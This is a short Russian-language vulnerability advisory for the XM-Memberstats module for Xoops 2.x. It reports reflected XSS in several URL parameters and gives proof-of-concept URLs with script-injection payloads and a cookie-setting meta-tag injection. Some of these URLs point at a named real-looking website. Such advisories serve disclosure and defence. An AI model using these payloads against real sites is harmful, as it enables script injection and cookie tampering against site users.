Программа: XM-Memberstats (module for Xoops) 2.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в в параметрах "letter" и "sortby" сценарием xmmemberstats/index.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Примеры:
XSS PoC :
http://www.website.com/modules/xmmemberstats/index.php? letter=A&sortby=[xss]&orderby=ASC&page=10
http://www.website.com/modules/rmgs/images.php?kw=1000&q=[xss]
http://www.euskadienduro.com/modules/xmmemberstats/index.php? letter=A&sortby=<script%20%0a%0d>alert(69)%3B </script>&orderby=ASC&page=10
http://www.euskadienduro.com/modules/rmgs/images.php?kw=1000 &q=>'><script%20%0a%0d>alert(69)%3B</script>
Манипуляция Cookies PoC:
http://www.website.com/modules/xmmemberstats/index.php?letter=A& sortby=<meta+http-equiv='Set-cookie'+content=' cookiename=cookievalue'>
